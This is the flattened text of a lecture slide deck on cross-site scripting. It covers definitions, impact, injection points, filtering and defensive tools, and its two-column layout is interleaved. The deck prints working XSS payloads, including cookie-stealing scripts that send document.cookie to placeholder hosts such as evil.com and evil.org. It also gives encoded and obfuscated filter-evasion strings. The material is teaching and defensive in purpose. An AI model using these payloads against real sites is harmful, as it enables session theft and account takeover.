First Some Credit

„ David Zimmer: “Real World XSS”

article.
„ Gunter Ollmann: “HTML Code
Injection and XSS”
„ Amit Klein: “XSS Explained”
„ GNUCITIZEN.ORG
Cross Site Scripting

Definition of XSS Example

„ An app level attack „ vulscript at vulsite, reads HTTP req,
„ Involves 3 parties echoes back w/o first sanitizing…
„ GET /vulscript.cgi?name=dylim
„ Want diverse and personalized HTTP/1.0
delivery Host: www.vulsite.org
„ but web app fails to validate user „ <HTML><Title>Welcome</Title> Hi
supplied input dylim… </HTML>
„ Attacker can craft link which causes the
„ Marc Slemko: XSS doesn’t have to be web browser to access vulsite, invoke
XS, or S. vulscript, with data=evilscript.
„ Goal: STEAL!!! „ Note that evilscript can access my
cookies related to vulsite.

Example cont’d Variations

„ Such a link could be: „ Other HTML tags
<b onMouseOver="self.location.href='http://evil.org/'"> bolded
„ http://www.vulsite.org/vulscript.cgi?name= text</b>

<script>alert(document.cookie)</script> „ POST, HTTP headers (referrer), path of

HTTP req (e.g. if error page returns the
„ Or erroneous path)
<script>window.open(“http://evil.com/stealcoo
kie.cgi?cookie=“+document.cookie)</script>
„ Typical formatting
„ <img src = "malicious.js">
„ <script>alert('hacked')</script>
„ <iframe = "malicious.js">
„ <script>document.write('<img
src="http://evil.org/'+document.cookie+'")
</script>
„ <a href="javascript:…">click-me</a>

1
Variations What about…
„ Flash! attack… „ data:text/html;base64,PHNjcmlwdD4
„ ActionScript, getURL() NCmFsZXJ0KCJTZWxmLWNvbnRhaW
5lZCBYU1MiKTsNCjwvc2NyaXB0Pg==
„ Self contained! i.e. doesn’t require
vulnerable web resource to echo
input.
„ allows dynamic creation of binary files
from JavaScript (can create files
containing malicious payload for
exploiting overflow vulnerabilities.)

XSS as an attack vector Impact

„ Strengths „ Theft of Account/Services
Can include very large audience w one injection
„
point
„ User Tracking/Stats
„ Can force users to some action, and access info „ Browser/User exploitation
they can access
„ Credentialed Misinformation
„ Can be hard to detect and slipped in quietly
„ Can be powerful for info display and alteration. „ Free Information Dissemination

„ Weaknesses
„ 95% can be avoided with proper filtering on
any user supplied data (several tools)

Together with Phishing, etc… Securing a site

„ Only here! By everything for „ Input sanitation
cheap.msg „ Programmer needs to cover all possible input
sources (query params, HTTP headers, etc)
„ PayPal Urgent Problems with „ Useless against vulnerabilities in 3rd party
Account Information.msg scripts/servers (e.g. err pages)
„ Save the world.msg „ Output filtering..
„ App firewalls
„ Can cover all input methods in a generic way.
„ Intercepts XSS attacks b4 they reach server.

2
Injection Points Filtering
„ Active XSS attacks „ Do you want to deny users the ability
„ Parameters passed in thru query string to use any form of HTML?
arguments that get written directly to a „ If not, what do you filter?
page. „ <plaintext>
„ Any where an html form can be injected „ 10M x 10M image of attacker
and have the user click a submit button
„ Passive XSS attacks
„ Database storage!
„ Error pages!

Filtering Many ways to circumvent

„ Img src and href… „ Simple filtering < and >
„ Parse out src= element and validate it: „ Use \x3c and \x3e
„ Remove quotes „ Commenting out malicious code
„ Deny urls with ? Querystring ids, make sure „ Just close the comment filter:
no .cgi, .pl, etc. <script>- --></comment>…</script>
„ Chk the protocol and deny everything except „ Separate window handling
http „ <a href="javascript:…">click-me</a> becomes:
<a href="javascript:…" target="_blank">click-me</a>
„ <a href="javascript:..." foo="bar>click-me</a>
<a href="javascript:..." foo="bar
target="_blank">click-me</a>

XSS tips and tricks. XSS tips and tricks..

„ script injection in an image src tag..
„ Embed nested quotes..
„ \’ or \”, or \u0022 \u0027
„ Keyword filters that allow any js to
execute are useless:
„ A = ‘navi’; B = ‘gator.userAgent’;
alert(eval(A+B))
„ Limited input length + script block embed
= unlimited script power (script src=)
„ SSL pages warn if script src comes from
untrusted site,
„ but if you can upload say img that is actually .js
commands..
„ methods of script encoding.
„ <img
src='vbscript:do%63ument.lo%63ation="http:/
/a.b.com"'>
„ <IMG SRC="javascript:alert('test');">
„ <IMG SRC="javasc ript:alert('test');">
„ Line break trick

3
Tools..
„ AppShield, AppScan by Sanctum
„ WebInspect
„ Utilities by David Zimmer
„ E.g. script encoding
„ XSS cheat sheet
http://ha.ckers.org/xss.html
„ XSS Shell, Backweb, XSS proxy,
BEEF…